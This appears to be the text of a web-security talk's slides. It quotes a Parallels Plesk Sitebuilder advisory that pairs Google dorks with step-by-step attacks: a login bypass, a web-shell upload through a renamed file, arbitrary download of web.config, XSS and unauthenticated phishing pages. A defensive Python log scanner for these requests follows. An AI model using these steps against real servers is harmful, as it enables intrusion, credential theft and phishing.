NOTE: For the next few minutes I am going to be something like the girl on the curve (la chica de la curva)
AGENDA
1. Presentation
2. Introduction to web security and existing attacks
3. Consequences. Practical examples
4. I have been attacked. Now what do I do?
5. Tools and services to protect ourselves with
6. Some useful tips
7. Shall we talk?
The answer is obvious:
What can I do?
http://projects.webappsec.org/f/WASC-TC-v2_0.pdf
http://youtu.be/vn-lU3Zu3dw
http://youtu.be/aCacibJa0Ps
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Title : Multiple Vulnerabilities in Parallels Plesk Sitebuilder
# Author : alieye
# vendor : http://www.parallels.com/
# Contact : cseye_ut@yahoo.com
# Risk : High
# Class: Remote
#
# Google Dork:
# inurl::2006/Sites ext:aspx
# inurl::2006 inurl:.ashx?mediaid
# intext:" Copyright 2004-2007 SWsoft." ext:aspx
# inurl:Wizard/HostingPreview.aspx?SiteID
#
# Date: 23/07/2014
# os : windows server 2003
# poc video clip : http://alieye.persiangig.com/video/plesk.rar/download
#
# version : for uploading shell (Parallels Plesk panel 9.5 - Parallels Plesk Sitebuilder 4.5) Copyright 2004-2010
# version : for other bug (Parallels Plesk panel 9.5 - Parallels Plesk Sitebuilder 4.5) Copyright 2004-2014
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
1-bypass loginpage (all version)
http://victim.com:2006/login.aspx
change url path to http://victim.com:2006/wizard
2-uploading shell via Live HTTP Headers(Copyright 2004-2010)
Tools Needed: Live HTTP Headers, Backdoor Shell
Step 1: Locate upload form on logo upload section in http://victim.com:2006/Wizard/DesignLayout.aspx
Step 2: Rename your shell to shell.asp.gif and start capturing data with Live HTTP Headers
Step 3: Replay data with Live HTTP Headers -
Step 4: Change [Content-Disposition: form-data; name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.gif"\r\n] to [Content-Disposition: form-data; name="ctl00$ContentS $FileUploadLogo"; filename="shell.asp.asp"\r\n]
Step 5: go to shell path: http://victim.com:2006/Sites/GUID Sitename created/App_Themes/green/images/shell_asp.asp
3-Arbitrary File Download Vulnerability(all version)
You can download any file from your target
http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=GUID Sitename created&p=filename
example:
http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=4227d5ca-7614-40b6-8dc6-02460354790b&p=web.config
4-xss(all version)
you can inject xss code in all module of this page http://victim.com:2006/Wizard/Edit.aspx
goto this page (edit.aspx), click on one module (Blog-eShop-Forum-...) then goto "Add New Category" and insert xss code in Category description and ....
Enjoy :)
5-not authentication for making a website(all version)
making malicious page and phishing page with these paths
http://victim.com:2006/Wizard/Pages.aspx
http://victim.com:2006/Wizard/Edit.aspx
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] special members: ZOD14C , 4l130h1 , bully13 , 3.14nnph , amir
[#] Thanks To All cseye members and All Iranian Hackers
[#] website : http://cseye.vcp.ir/
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Spt Tnx To Master of Persian Music: Hossein Alizadeh
[#] Hossein Alizadeh website : http://www.hosseinalizadeh.net/
[#] download ney-nava album : http://dnl1.tebyan.net/1388/02/2009052010245138.rar
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
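An added example, not part of the slides or of the quoted advisory: a log check a defender could run over the Sitebuilder site's IIS W3C logs to surface the request patterns the advisory describes (Wizard pages reached without a login, the image handler asked for a non-image file, a script extension served from a theme's images folder). The field layout, the sample lines, the rule names and the rule that a POST to /login.aspx answered with 302 is a successful login are assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed sample in IIS W3C extended format (not real traffic).
SAMPLE_LOG = """\
#Fields: c-ip cs-method cs-uri-stem cs-uri-query s-port sc-status
198.51.100.7 POST /login.aspx - 2006 302
198.51.100.7 GET /Wizard/Pages.aspx - 2006 200
203.0.113.9 GET /Wizard/Edit.aspx - 2006 200
203.0.113.9 GET /Wizard/EditPage/ImageManager/Site.ashx s=SITE-GUID&p=web.config 2006 200
203.0.113.9 GET /Wizard/EditPage/ImageManager/Site.ashx s=SITE-GUID&p=logo.gif 2006 200
203.0.113.9 GET /Sites/SITE-GUID/App_Themes/green/images/x_asp.asp - 2006 200
"""

IMAGE_EXT = {".gif", ".jpg", ".jpeg", ".png", ".bmp"}
SCRIPT_IN_IMAGES = re.compile(
    r"^/sites/[^/]+/app_themes/.+/images/[^/]+\.(asp|aspx|ashx|asa)$", re.I)

def scan(log_text):
    """Return (line_number, rule) findings for one W3C log."""
    fields, logged_in, findings = [], set(), []
    for n, line in enumerate(log_text.splitlines(), 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        row = dict(zip(fields, line.split()))
        stem, ip = row.get("cs-uri-stem", "").lower(), row.get("c-ip")
        # Assumption: POST /login.aspx answered with 302 is a successful login.
        if (stem, row.get("cs-method"), row.get("sc-status")) == ("/login.aspx", "POST", "302"):
            logged_in.add(ip)
        # Wizard pages requested by a client that never logged in.
        if stem.startswith("/wizard") and ip not in logged_in:
            findings.append((n, "wizard-without-login"))
        # Image handler asked for a non-image name or a path outside its folder.
        if stem.endswith("/imagemanager/site.ashx"):
            p = parse_qs(row.get("cs-uri-query", "")).get("p", [""])[0].lower()
            ext = p[p.rfind("."):] if "." in p else ""
            if ext not in IMAGE_EXT or any(s in p for s in ("..", "/", "\\")):
                findings.append((n, "non-image-download"))
        # Server-side script extension served from a theme's images folder.
        if SCRIPT_IN_IMAGES.match(stem):
            findings.append((n, "script-in-image-dir"))
    return findings

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Keying the login state on client IP is a simplification; behind a proxy or NAT the check should key on a session identifier instead.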
http://youtu.be/dGLM_xjZZms
http://youtu.be/UtU1gGv9xNw
http://es.linkedin.com/in/borjalanseros/
@borjalanseros
7. Shall we talk?